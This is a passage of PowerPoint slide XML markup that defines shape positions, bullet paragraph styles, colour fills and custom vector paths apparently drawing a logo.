            </a:pr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801960" y="5481720"/>
              <a:ext cx="136080" cy="136440"/>
            </a:xfrm>
            <a:prstGeom prst="rect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808240" y="5484960"/>
              <a:ext cx="136440" cy="136440"/>
            </a:xfrm>
            <a:prstGeom prst="rect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5369040"/>
            <a:ext cx="336600" cy="19461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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022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d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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2022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d520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2022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d52022"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-220680">
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466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2022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d52022"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1550880" indent="-228600">
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466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2022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d52022"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="1959120" indent="-228600">
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466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2022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d52022"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5" marL="195912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2022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d52022"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="6" marL="195912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2022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d52022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737560" y="6829560"/>
            <a:ext cx="311040" cy="14904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844120" y="6873840"/>
            <a:ext cx="463320" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="b501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285120" y="6978600"/>
            <a:ext cx="155880" cy="204840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="d0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35000" y="76320"/>
            <a:ext cx="1800000" cy="863280"/>
            <a:chOff x="135000" y="76320"/>
            <a:chExt cx="1800000" cy="863280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="94" name=""/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1023480" y="186840"/>
              <a:ext cx="638640" cy="461880"/>
              <a:chOff x="1023480" y="186840"/>
              <a:chExt cx="638640" cy="461880"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="95" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1023480" y="318600"/>
                <a:ext cx="263160" cy="326520"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4353" h="5451">
                    <a:moveTo>
                      <a:pt x="4030" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3992" y="0"/>
                      <a:pt x="3937" y="5"/>
                      <a:pt x="3894" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3817" y="60"/>
                      <a:pt x="3765" y="125"/>
                      <a:pt x="3731" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3717" y="204"/>
                      <a:pt x="3647" y="335"/>
                      <a:pt x="3604" y="445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3183" y="1488"/>
                      <a:pt x="2239" y="3897"/>
                      <a:pt x="2239" y="3897"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2181" y="4040"/>
                      <a:pt x="2126" y="4117"/>
                      <a:pt x="2078" y="4117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2033" y="4119"/>
                      <a:pt x="1976" y="4038"/>
                      <a:pt x="1911" y="3870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1705" y="3339"/>
                      <a:pt x="521" y="426"/>
                      <a:pt x="521" y="426"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1744" y="5116"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1849" y="5365"/>
                      <a:pt x="2248" y="5451"/>
                      <a:pt x="2382" y="5126"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4190" y="778"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4190" y="778"/>
                      <a:pt x="4348" y="440"/>
                      <a:pt x="4351" y="326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4353" y="161"/>
                      <a:pt x="4293" y="103"/>
                      <a:pt x="4229" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4164" y="15"/>
                      <a:pt x="4092" y="3"/>
                      <a:pt x="4030" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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514520" y="322560"/>
                <a:ext cx="147600" cy="326160"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2442" h="5446">
                    <a:moveTo>
                      <a:pt x="327" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="0"/>
                      <a:pt x="0" y="163"/>
                      <a:pt x="0" y="361"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3944"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3944"/>
                      <a:pt x="9" y="4111"/>
                      <a:pt x="14" y="4150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="5446"/>
                      <a:pt x="1313" y="5276"/>
                      <a:pt x="1480" y="5245"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2164" y="5245"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2317" y="5245"/>
                      <a:pt x="2442" y="5066"/>
                      <a:pt x="2442" y="4841"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2442" y="4618"/>
                      <a:pt x="2317" y="4437"/>
                      <a:pt x="2164" y="4437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2164" y="4437"/>
                      <a:pt x="1492" y="4434"/>
                      <a:pt x="1463" y="4434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="4446"/>
                      <a:pt x="655" y="4001"/>
                      <a:pt x="655" y="3944"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="655" y="361"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="163"/>
                      <a:pt x="509" y="0"/>
                      <a:pt x="327" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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324440" y="186840"/>
                <a:ext cx="88560" cy="90720"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1466" h="1516">
                    <a:moveTo>
                      <a:pt x="0" y="777"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="533"/>
                      <a:pt x="69" y="344"/>
                      <a:pt x="206" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="67"/>
                      <a:pt x="519" y="0"/>
                      <a:pt x="734" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="875" y="0"/>
                      <a:pt x="1002" y="31"/>
                      <a:pt x="1117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="160"/>
                      <a:pt x="1318" y="251"/>
                      <a:pt x="1375" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1435" y="483"/>
                      <a:pt x="1466" y="614"/>
                      <a:pt x="1466" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1466" y="908"/>
                      <a:pt x="1435" y="1042"/>
                      <a:pt x="1373" y="1160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1308" y="1277"/>
                      <a:pt x="1220" y="1365"/>
                      <a:pt x="1105" y="1427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="990" y="1487"/>
                      <a:pt x="866" y="1516"/>
                      <a:pt x="732" y="1516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="588" y="1516"/>
                      <a:pt x="459" y="1483"/>
                      <a:pt x="347" y="1418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="1351"/>
                      <a:pt x="146" y="1260"/>
                      <a:pt x="88" y="1143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="1028"/>
                      <a:pt x="0" y="906"/>
                      <a:pt x="0" y="777"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="779"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="210" y="956"/>
                      <a:pt x="258" y="1097"/>
                      <a:pt x="359" y="1198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="457" y="1301"/>
                      <a:pt x="581" y="1351"/>
                      <a:pt x="732" y="1351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="885" y="1351"/>
                      <a:pt x="1009" y="1301"/>
                      <a:pt x="1110" y="1198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1208" y="1095"/>
                      <a:pt x="1256" y="949"/>
                      <a:pt x="1256" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1256" y="641"/>
                      <a:pt x="1234" y="535"/>
                      <a:pt x="1193" y="447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1150" y="358"/>
                      <a:pt x="1088" y="289"/>
                      <a:pt x="1007" y="239"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="191"/>
                      <a:pt x="837" y="165"/>
                      <a:pt x="734" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="591" y="165"/>
                      <a:pt x="469" y="212"/>
                      <a:pt x="364" y="308"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261" y="401"/>
                      <a:pt x="210" y="559"/>
                      <a:pt x="210" y="779"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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224720" y="319680"/>
                <a:ext cx="277920" cy="321840"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4602" h="5376">
                    <a:moveTo>
                      <a:pt x="2313" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2100" y="0"/>
                      <a:pt x="2014" y="158"/>
                      <a:pt x="1990" y="215"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="50" y="4903"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5049"/>
                      <a:pt x="72" y="5264"/>
                      <a:pt x="239" y="5338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="5376"/>
                      <a:pt x="457" y="5369"/>
                      <a:pt x="550" y="5307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="565" y="5295"/>
                      <a:pt x="639" y="5240"/>
                      <a:pt x="682" y="5135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="742" y="4996"/>
                      <a:pt x="2004" y="1896"/>
                      <a:pt x="2177" y="1437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2255" y="1224"/>
                      <a:pt x="2368" y="1243"/>
                      <a:pt x="2432" y="1440"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2449" y="1485"/>
                      <a:pt x="3784" y="4886"/>
                      <a:pt x="3908" y="5094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4033" y="5302"/>
                      <a:pt x="4178" y="5362"/>
                      <a:pt x="4351" y="5290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4520" y="5221"/>
                      <a:pt x="4602" y="4987"/>
                      <a:pt x="4535" y="4860"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4523" y="4836"/>
                      <a:pt x="2643" y="249"/>
                      <a:pt x="2643" y="249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2629" y="213"/>
                      <a:pt x="2576" y="0"/>
                      <a:pt x="2313" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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135000" y="363600"/>
              <a:ext cx="836640" cy="239760"/>
              <a:chOff x="135000" y="363600"/>
              <a:chExt cx="836640" cy="239760"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="100" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="777240" y="364680"/>
                <a:ext cx="194400" cy="232920"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3215" h="3889">
                    <a:moveTo>
                      <a:pt x="1170" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="10"/>
                      <a:pt x="335" y="170"/>
                      <a:pt x="139" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="636"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="990"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3262"/>
                      <a:pt x="141" y="3521"/>
                      <a:pt x="421" y="3693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="3825"/>
                      <a:pt x="897" y="3889"/>
                      <a:pt x="1170" y="3889"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3033" y="3889"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3155" y="3889"/>
                      <a:pt x="3215" y="3779"/>
                      <a:pt x="3215" y="3557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3215" y="3389"/>
                      <a:pt x="3155" y="3306"/>
                      <a:pt x="3033" y="3306"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1194" y="3306"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="749" y="3306"/>
                      <a:pt x="524" y="3169"/>
                      <a:pt x="524" y="2894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="524" y="2366"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="2366"/>
                      <a:pt x="529" y="2275"/>
                      <a:pt x="605" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="622" y="2251"/>
                      <a:pt x="3033" y="2256"/>
                      <a:pt x="3033" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3162" y="2256"/>
                      <a:pt x="3212" y="2153"/>
                      <a:pt x="3212" y="1945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3212" y="1763"/>
                      <a:pt x="3162" y="1672"/>
                      <a:pt x="3033" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3033" y="1672"/>
                      <a:pt x="648" y="1672"/>
                      <a:pt x="641" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="548" y="1670"/>
                      <a:pt x="519" y="1598"/>
                      <a:pt x="519" y="1572"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="519" y="990"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="519" y="751"/>
                      <a:pt x="770" y="603"/>
                      <a:pt x="1129" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1172" y="574"/>
                      <a:pt x="2851" y="577"/>
                      <a:pt x="2851" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3040" y="577"/>
                      <a:pt x="3191" y="447"/>
                      <a:pt x="3191" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3191" y="129"/>
                      <a:pt x="3040" y="0"/>
                      <a:pt x="2851" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1722" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1722" y="0"/>
                      <a:pt x="1172" y="0"/>
                      <a:pt x="1170" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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39120" y="364680"/>
                <a:ext cx="194040" cy="232920"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3214" h="3889">
                    <a:moveTo>
                      <a:pt x="1167" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="677" y="10"/>
                      <a:pt x="332" y="170"/>
                      <a:pt x="138" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="636"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="990"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2920"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3262"/>
                      <a:pt x="141" y="3521"/>
                      <a:pt x="421" y="3693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="3825"/>
                      <a:pt x="894" y="3889"/>
                      <a:pt x="1167" y="3889"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3030" y="3889"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3152" y="3889"/>
                      <a:pt x="3214" y="3779"/>
                      <a:pt x="3214" y="3557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3214" y="3389"/>
                      <a:pt x="3152" y="3306"/>
                      <a:pt x="3030" y="3306"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1193" y="3306"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="746" y="3306"/>
                      <a:pt x="524" y="3169"/>
                      <a:pt x="524" y="2894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="524" y="2366"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="2366"/>
                      <a:pt x="526" y="2275"/>
                      <a:pt x="602" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="2251"/>
                      <a:pt x="3030" y="2256"/>
                      <a:pt x="3030" y="2256"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3159" y="2256"/>
                      <a:pt x="3212" y="2153"/>
                      <a:pt x="3212" y="1945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3212" y="1763"/>
                      <a:pt x="3159" y="1672"/>
                      <a:pt x="3032" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3032" y="1672"/>
                      <a:pt x="648" y="1672"/>
                      <a:pt x="638" y="1672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="545" y="1670"/>
                      <a:pt x="519" y="1598"/>
                      <a:pt x="516" y="1572"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="516" y="990"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="516" y="751"/>
                      <a:pt x="767" y="603"/>
                      <a:pt x="1126" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1172" y="574"/>
                      <a:pt x="2848" y="577"/>
                      <a:pt x="2848" y="577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3037" y="577"/>
                      <a:pt x="3190" y="447"/>
                      <a:pt x="3190" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3190" y="129"/>
                      <a:pt x="3037" y="0"/>
                      <a:pt x="2848" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1722" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1722" y="0"/>
                      <a:pt x="1172" y="0"/>
                      <a:pt x="1167" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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35000" y="363600"/>
                <a:ext cx="192240" cy="234000"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3181" h="3910">
                    <a:moveTo>
                      <a:pt x="254" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="0"/>
                      <a:pt x="110" y="16"/>
                      <a:pt x="62" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="86"/>
                      <a:pt x="36" y="100"/>
                      <a:pt x="26" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="162"/>
                      <a:pt x="0" y="210"/>
                      <a:pt x="0" y="270"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3664"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3783"/>
                      <a:pt x="36" y="3860"/>
                      <a:pt x="105" y="3891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="3903"/>
                      <a:pt x="199" y="3910"/>
                      <a:pt x="323" y="3910"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="445" y="3910"/>
                      <a:pt x="507" y="3826"/>
                      <a:pt x="507" y="3659"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="507" y="2458"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="507" y="2458"/>
                      <a:pt x="507" y="2327"/>
                      <a:pt x="610" y="2379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="631" y="2387"/>
                      <a:pt x="2698" y="3881"/>
                      <a:pt x="2698" y="3881"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2724" y="3901"/>
                      <a:pt x="2813" y="3910"/>
                      <a:pt x="2968" y="3910"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3109" y="3910"/>
                      <a:pt x="3181" y="3834"/>
                      <a:pt x="3181" y="3678"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3181" y="3578"/>
                      <a:pt x="3138" y="3496"/>
                      <a:pt x="3057" y="3434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3057" y="3434"/>
                      <a:pt x="1043" y="1987"/>
                      <a:pt x="1040" y="1985"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="983" y="1946"/>
                      <a:pt x="1016" y="1899"/>
                      <a:pt x="1040" y="1877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1060" y="1858"/>
                      <a:pt x="2985" y="490"/>
                      <a:pt x="2985" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3069" y="428"/>
                      <a:pt x="3109" y="349"/>
                      <a:pt x="3109" y="251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3109" y="98"/>
                      <a:pt x="3040" y="21"/>
                      <a:pt x="2901" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2753" y="21"/>
                      <a:pt x="2645" y="24"/>
                      <a:pt x="2617" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2617" y="45"/>
                      <a:pt x="665" y="1461"/>
                      <a:pt x="662" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="533" y="1545"/>
                      <a:pt x="512" y="1451"/>
                      <a:pt x="507" y="1399"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="507" y="270"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="507" y="162"/>
                      <a:pt x="483" y="88"/>
                      <a:pt x="430" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="19"/>
                      <a:pt x="311" y="0"/>
                      <a:pt x="254" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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50800" y="363600"/>
                <a:ext cx="212400" cy="239760"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3521" h="4001">
                    <a:moveTo>
                      <a:pt x="280" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="14"/>
                      <a:pt x="0" y="134"/>
                      <a:pt x="0" y="301"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3616"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3781"/>
                      <a:pt x="113" y="3913"/>
                      <a:pt x="254" y="3913"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="392" y="3913"/>
                      <a:pt x="505" y="3781"/>
                      <a:pt x="505" y="3616"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="505" y="2564"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="505" y="2521"/>
                      <a:pt x="553" y="2509"/>
                      <a:pt x="636" y="2559"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2985" y="3949"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3076" y="4001"/>
                      <a:pt x="3188" y="3975"/>
                      <a:pt x="3274" y="3896"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3296" y="3875"/>
                      <a:pt x="3322" y="3844"/>
                      <a:pt x="3344" y="3810"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3363" y="3777"/>
                      <a:pt x="3373" y="3755"/>
                      <a:pt x="3377" y="3719"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3382" y="3683"/>
                      <a:pt x="3382" y="3631"/>
                      <a:pt x="3380" y="3609"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3365" y="3540"/>
                      <a:pt x="3334" y="3478"/>
                      <a:pt x="3274" y="3447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3274" y="3447"/>
                      <a:pt x="2997" y="3296"/>
                      <a:pt x="2880" y="3229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2476" y="2997"/>
                      <a:pt x="1540" y="2437"/>
                      <a:pt x="1540" y="2437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1509" y="2408"/>
                      <a:pt x="1584" y="2406"/>
                      <a:pt x="1584" y="2406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1584" y="2406"/>
                      <a:pt x="2588" y="2406"/>
                      <a:pt x="2590" y="2406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2614" y="2404"/>
                      <a:pt x="3475" y="2468"/>
                      <a:pt x="3516" y="1607"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3516" y="1588"/>
